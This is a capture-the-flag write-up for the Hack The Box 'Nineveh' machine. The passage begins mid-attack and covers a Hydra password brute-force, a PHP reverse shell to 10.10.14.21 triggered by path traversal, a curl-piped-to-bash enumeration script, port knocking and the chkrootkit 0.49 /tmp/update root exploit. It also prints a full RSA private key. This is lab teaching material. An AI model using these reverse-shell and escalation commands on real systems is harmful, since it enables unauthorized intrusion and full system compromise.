Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-07 22:11:57 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking http-post-forms://nineveh.htb:443/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password [STATUS] 1006.00 tries/min, 1006 tries in 00:01h, 14343392 to do in 237:38h, 16 active [443][http-post-form] host: nineveh.htb login: admin password: password123 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-07 22:13:20

Reverse shell

Create php file

Nineveh14.png

Nineveh15.png

Database creation.

Nineveh16.png

Table creation.

Nineveh17.png

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f"); ?>

On the field, we paste the php system command to open a reverse shell.

Nineveh18.png Nineveh19.png

The php file has been created on path /var/tmp/reverse.php.

Start listener

u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Call reverse.php

Nineveh20.png Nineveh21.png

If we click on Notes link, we see some notes are added to the bottom of the page. These notes seems to be read from a file.

Nineveh22.png

Playing with the URL, we are able to abuse the URL to open the file /etc/passwd.

http://nineveh.htb/department/manage.php?notes=/files/ninevehNotes.txt/../../var/tmp/reverse.php

Nineveh24.png With the following URL, we are able to call our reverse shell script.

u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.43.
Ncat: Connection from 10.10.10.43:59278.
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@nineveh:/var/www/html/department$ stty raw -echo
stty raw -echo

User flag

The port ssh is not available externally but is listening on the localhost. So probably we can ssh on the user amrois with the private key we found earlier.

www-data@nineveh:/var/www/html/department$ netstat -napl | grep LISTEN | grep 22
(Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -

So we download the private key.

u505@kali:~/HTB/Machines/Nineveh/www$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
u505@kali:~/HTB/Machines/Nineveh/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.43 - - [07/May/2020 23:11:07] "GET /id_rsa HTTP/1.1" 200 -

From the target.

www-data@nineveh:/var/www/html/department$ cd /tmp
www-data@nineveh:/tmp$ wget -q http://10.10.14.21/id_rsa
www-data@nineveh:/tmp$ chmod 600 id_rsa
www-data@nineveh:/tmp$ ssh -i id_rsa amrois@127.0.0.1
Could not create directory '/var/www/.ssh'.
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
Are you sure you want to continue connecting (yes/no)? yes

Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts). Ubuntu 16.04.2 LTS Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
133 packages can be updated. 66 updates are security updates.

You have mail. Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ cat user.txt <USER_FLAG>

Privileges escalation

We execute the enumeration script

amrois@nineveh:/tmp$ curl http://10.10.14.32/LinEnum.sh | bash
...
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h  dom mon dow   command
*/10 * * * * /usr/sbin/report-reset.sh
...
[-] Any interesting mail in /var/mail:
total 12
drwxrwsr-x  2 root   mail 4096 Jul  2  2017 .
drwxr-xr-x 14 root   root 4096 Jul  2  2017 ..
-rw-r--r--  1 amrois mail  483 Jul  2  2017 amrois
...

It seems there is a crontab but the crontab is owned by amrois, and there is also a non empty mail file in amrois account.

report-reset.sh

amrois@nineveh:~$ ls -l /usr/sbin/report-reset.sh
-rwxr-x--- 1 amrois amrois 34 Jul  2  2017 /usr/sbin/report-reset.sh
amrois@nineveh:~$ cat /usr/sbin/report-reset.sh
#!/bin/bash

rm -rf /report/*.txt amrois@nineveh:~$ ls -l /report/ total 56 -rw-r--r-- 1 amrois amrois 4802 May 11 15:20 report-20-05-11:15:20.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:21 report-20-05-11:15:21.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:22 report-20-05-11:15:22.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:23 report-20-05-11:15:23.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:24 report-20-05-11:15:24.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:25 report-20-05-11:15:25.txt -rw-r--r-- 1 amrois amrois 4802 May 11 15:26 report-20-05-11:15:26.txt amrois@nineveh:~$ head /report/report-20-05-11:15:26.txt ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `crontab'... not infected Checking `date'... not infected Checking `du'... not infected

The crontab delete files in report folder. Files seems to be a check report. The origin of the file is still unknown.

/var/mail/amrois

amrois@nineveh:/var/mail$ cat amrois
From root@nineveh.htb  Fri Jun 23 14:04:19 2017
Return-Path: <root@nineveh.htb>
X-Original-To: amrois
Delivered-To: amrois@nineveh.htb
Received: by nineveh.htb (Postfix, from userid 1000)
        id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: amrois@nineveh.htb
From: root@nineveh.htb
Subject: Another Important note!
Message-Id: <20170623190419.D289B2E3587@nineveh.htb>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)

Amrois! please knock the door next time! 571 290 911

After some search, we find a strange process.

amrois@nineveh:~$ ps -ef | grep kno
root      1295     1  1 14:55 ?        00:00:22 /usr/sbin/knockd -d -i ens33
amrois    4077 24483  0 15:30 pts/1    00:00:00 grep --color=auto kno
amrois@nineveh:~$ ls -l /etc/kn*
-rw-r--r-- 1 root root 354 Aug  5  2017 /etc/knockd.conf
amrois@nineveh:~$ cat /etc/knockd.conf
[options]
 logfile = /var/log/knockd.log
 interface = ens33

[openSSH] sequence = 571, 290, 911 seq_timeout = 5 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
[closeSSH] sequence = 911,290,571 seq_timeout = 5 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn

The knock daemon should open the ssh port with the TCP syn sequence 571 290 and 911

u505@kali:~/HTB/Machines/Nineveh/www$ for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43; done
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 23:31 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for nineveh.htb (10.10.10.43)
Host is up.

PORT STATE SERVICE 571/tcp filtered umeter
Nmap done: 1 IP address (1 host up) scanned in 1.03 seconds Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 23:31 EDT Warning: 10.10.10.43 giving up on port because retransmission cap hit (0). Nmap scan report for nineveh.htb (10.10.10.43) Host is up.
PORT STATE SERVICE 290/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 23:31 EDT Warning: 10.10.10.43 giving up on port because retransmission cap hit (0). Nmap scan report for nineveh.htb (10.10.10.43) Host is up.
PORT STATE SERVICE 911/tcp filtered xact-backup
Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds

And the ssh port is open and available for amrois.

u505@kali:~/HTB/Machines/Nineveh/www$ ssh -i id_rsa amrois@10.10.10.43
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
133 packages can be updated. 66 updates are security updates.

You have mail. Last login: Thu May 7 22:25:34 2020 from 127.0.0.1

Access of ssh service is not mandatory to resolve the machine, but it is easier.

pspy

We copy pspy by ssh

u505@kali:~/HTB/Machines/Nineveh/www$ scp -i id_rsa /opt/utils/pspy/pspy64 amrois@nineveh.htb:/tmp/
Ubuntu 16.04.2 LTS
pspy64                                        100% 3006KB   3.4MB/s   00:00

And after 1 minute, we observe a root job.

2020/05/11 15:47:01 CMD: UID=0    PID=19515  | /usr/sbin/CRON -f
2020/05/11 15:47:01 CMD: UID=0    PID=19517  | /bin/sh -c /root/vulnScan.sh
2020/05/11 15:47:01 CMD: UID=0    PID=19516  | /bin/sh -c /root/vulnScan.sh
2020/05/11 15:47:01 CMD: UID=0    PID=19518  | /bin/bash /root/vulnScan.sh
2020/05/11 15:47:01 CMD: UID=0    PID=19520  | /bin/sh /usr/bin/chkrootkit
...

Each minute, the script /root/vulnScan.sh is called by user root. The command chkrootkit is called. It seems this is this script that generated the report files.

 u505@kali:~/HTB/Machines/Nineveh$ searchsploit chkrootkit
----------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                   |  Path
                                                                 | (/usr/share/exploitdb/)
----------------------------------------------------------------- ----------------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit)             | exploits/linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation                     | exploits/linux/local/33899.txt
----------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

u505@kali:~/HTB/Machines/Nineveh$ searchsploit -m 33899 Exploit: Chkrootkit 0.49 - Local Privilege Escalation URL: https://www.exploit-db.com/exploits/33899 Path: /usr/share/exploitdb/exploits/linux/local/33899.txt File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Nineveh/33899.txt

We cannot verify the version of chkrootkit, but the exploit 33899 explains that the file ${ROOTDIR}tmp/update is executed as root. The first line of the report files is

amrois@nineveh:~$ ls -l /report/
total 32
-rw-r--r-- 1 amrois amrois 4802 May 11 15:50 report-20-05-11:15:50.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:51 report-20-05-11:15:51.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:52 report-20-05-11:15:52.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:53 report-20-05-11:15:53.txt
amrois@nineveh:~$ head -n 5 /report/report-20-05-11:15:50.txt
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected

So normally, if we create the file /tmp/update, it should be executed as root each minute.

Root Flag

We start the listener

u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -nlvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445

/tmp/update file creation

amrois@nineveh:/tmp$ echo "rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.10.14.21 4445 >/tmp/g" > update
amrois@nineveh:/tmp$ cat update
rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.10.14.21 4445 >/tmp/g
amrois@nineveh:/tmp$ ls -l update
-rw-rw-r-- 1 amrois amrois 79 May  7 22:53 update
amrois@nineveh:/tmp$ chmod +x update

Within the minute

u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -lnvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.43.
Ncat: Connection from 10.10.10.43:42754.
/bin/sh: 0: can't access tty; job control turned off
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@nineveh:~# stty raw -echo
stty raw -echo
root@nineveh:~# cat root.txt
<ROOT_FLAG>

Now we can confirm the chkrootkit version.

root@nineveh:~# /usr/bin/chkrootkit -V
chkrootkit version 0.49

References

Daniel Simao 14:38, 10 May 2020 (EDT)